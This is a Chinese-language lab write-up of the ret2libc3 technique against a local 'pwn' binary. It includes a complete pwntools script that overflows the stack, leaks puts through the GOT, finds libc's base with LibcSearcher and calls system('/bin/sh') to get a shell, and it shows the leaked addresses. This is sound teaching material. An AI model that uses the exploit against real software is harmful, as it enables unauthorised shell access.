利用ret2libc3实验原理，用pwn的文件来尝试一下。

首先，拿到了一个pwn文件，用IDA女神看看源程序是什么样子的。

这里有read函数，看来可以靠栈的溢出来实现getshell。

这次相比实验二的难点在于不允许使用system函数，然后都需要自己找到。

system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。

也就是说可以通过泄露出某个函数的地址，减去在libc中的相对偏移，就能得到libc的基址，利用system的相对偏移就可以找到system函数。这里利用了puts函数。

为了得到libc中函数的地址，我们用的是got表泄露。涉及到got表与plt表的关系，大家可以去这里看一下。

GOT表和PLT表知识详解 - qq_18661257的专栏 - CSDN博客

国际惯例，看一哈文件保护，果然没什么有效的保护。

接下来就是找system函数的地址，写个脚本，主要是为了实现与pwn文件交互。

from pwn import *   

from LibcSearcher import *   #库函数LibcSearcher

import pwnlib    #能够进行动态调试

这两句可以理解为搭调试的环境，方便动态调试。

context.log_level='debug'

context.terminal=['gnome-terminal','-x','sh','-c'] 

下面进行puts地址的泄露。

p=process('./pwn') #创建进程

elf=ELF('./pwn') #以ELF为格式创建对象

main=0x080484FD  #主函数地址

payload='a'*112+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])

pwnlib.gdb,attach(p)

p.recvuntil('try\n')

p.sendline(payload)

puts=u32(p.recv(4)) #解包，取前四个

print('puts',hex(puts))

我们是在文件第一次执行的时候泄露puts。payload的作用如下图所示，将read函数的返回值赋为puts.plt，main函数的地址又为puts函数的返回值，puts.got作为puts函数的参数，泄露puts函数的地址。

主函数的地址在IDA里可以看到，至于填充多少个字符，方法在实验二讲述过。

main = 0x080484FD

接下来就是利用泄露出来的地址找到system和字符串_bin_sh。

LIbcSearcher利用泄露的puts函数的地址找到libc的版本，libc.dump可以查出偏移量，进而找出libcbase，也就是库函数的基址，再加上system的偏移就可以得到它的地址。

libc =LibcSearcher('puts',puts)

libcbase=puts-libc.dump('puts')

system=libcbase+libc.dump('system')

bin_sh=libcbase+libc.dump('str_bin_sh')

print('system',hex(system))       #将system的地址打印出来

print('binsh',hex(bin_sh))        #将bin_sh打印

payload='a'*104+p32(system)+p32(0xdeadbeef)+p32(bin_sh)

p.sendline(payload)

p.interactive() #交互

在脚本终端可以看到打印的地址。

puts：0xf7df9140

system:   0xf7dd4940

binsh:  0xf7ef302b

输入ls，可以看到电脑中的文件，getshell，也可以看看我是谁，hh。

唉，实验做出来不容易，环境崩了以后调了好久，网上的方法都试过了，没有用（Tina噜，我的电脑和大家的不一样妈？！！！）。

最后将编译器重新装了一遍就好了......哭辽。